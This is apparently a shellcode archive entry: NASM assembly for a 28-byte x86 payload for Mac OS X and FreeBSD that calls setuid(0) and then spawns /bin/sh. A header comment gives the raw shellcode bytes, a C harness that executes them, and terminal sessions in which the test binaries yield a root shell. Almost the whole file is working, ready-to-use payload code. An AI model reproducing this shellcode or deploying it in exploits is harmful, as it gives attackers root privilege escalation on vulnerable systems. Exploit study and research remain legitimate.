; Shellcode-Desc .: setuid(0) + execve() of /bin/sh
; Shellcode-Size .: 28 bytes
; Shellcode-Id ...: 8a46e92e51db66046f4dd151f4b87ba6
; Shellcode-Arch .: x86
; Nasm-Version ...: NASM version 0.98.40 (Apple Computer, Inc. build 9) compiled on Apr  6 2006
; Ndisasm-Version : NDISASM version 0.98.40 (Apple Computer, Inc. build 9) compiled Apr  6 2006
; Tested-OSs .....: Mac OS X 10.4.x , FreeBSD 5.5-STABLE
;
; RageMan <rageman@olografix.org>
;         <rageman@s0ftpj.org>
;
; Eva:~/shellcodes rageman$ nasm execve-0x04.asm -fmacho
; Eva:~/shellcodes rageman$ ld -o execve-0x04 execve-0x04.o 
; Eva:~/shellcodes rageman$ sudo chmod 4777 execve-0x04
; Eva:~/shellcodes rageman$ sudo chown root execve-0x04
; Eva:~/shellcodes rageman$ ./execve-0x04 
; Eva:/Users/rageman/shellcodes root# id
; uid=0(root) gid=501(rageman) groups=501(rageman), 81(appserveradm), 79(appserverusr), 80(admin)
; Eva:/Users/rageman/shellcodes root# exit
; exit
; Eva:~/shellcodes rageman$ gcc -w -o -O1 execve-0x04 execve-0x04.c 
; Eva:~/shellcodes rageman$ sudo chmod 4777 execve-0x04
; Eva:~/shellcodes rageman$ sudo chown root execve-0x04
; Eva:~/shellcodes rageman$ ./execve-0x04
; Eva:/Users/rageman/shellcodes root# id
; uid=0(root) gid=501(rageman) groups=501(rageman), 81(appserveradm), 79(appserverusr), 80(admin)
; Eva:/Users/rageman/shellcodes root# exit
;
; <---execve-0x04.c-->
; char shellcode[] =
;        "\x99\x52\x52\xb0\x17\xcd\x80\x68"
;        "\x2f\x2f\x73\x68\x68\x2f\x62\x69"
;        "\x6e\x89\xe3\x52\x54\x54\x53\x52"
;        "\xb0\x3b\xcd\x80";
;
; int main()
; {
;         void (*fp)() = shellcode;
;         fp();
; }
; <-/-execve-0x04.c-->

BITS 32

GLOBAL _main

_main:
                       ; setuid()
cdq                    ; prepare uid_t 0
push edx	       ; push uid_t into the stack
push edx	       ; dummy ( and \0 )
mov  al, 0x17          ; value of SYS_setuid
int  0x80              ; invoke kernel
 
                       ; execve arguments
push 0x68732f2f        ; put hs// into the stack 
push 0x6e69622f        ; put nib/ into the stack  
mov  ebx, esp          ; write string address into ebx 

                       ; execve()
push edx               ; char *const envp[]
push esp               ; char *const argv[]
push esp               ; 
push ebx               ; const char *path
push edx               ; dummy
mov  al, 0x3b          ; value of SYS_execve
int  0x80              ; invoke kernel